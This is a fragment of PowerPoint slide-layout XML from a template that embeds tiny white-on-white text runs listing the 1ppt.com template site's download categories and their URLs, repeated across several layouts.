              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout213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13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13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13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1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14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14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14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14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14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14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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout214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14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14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14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1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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout215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15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15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15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15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15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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
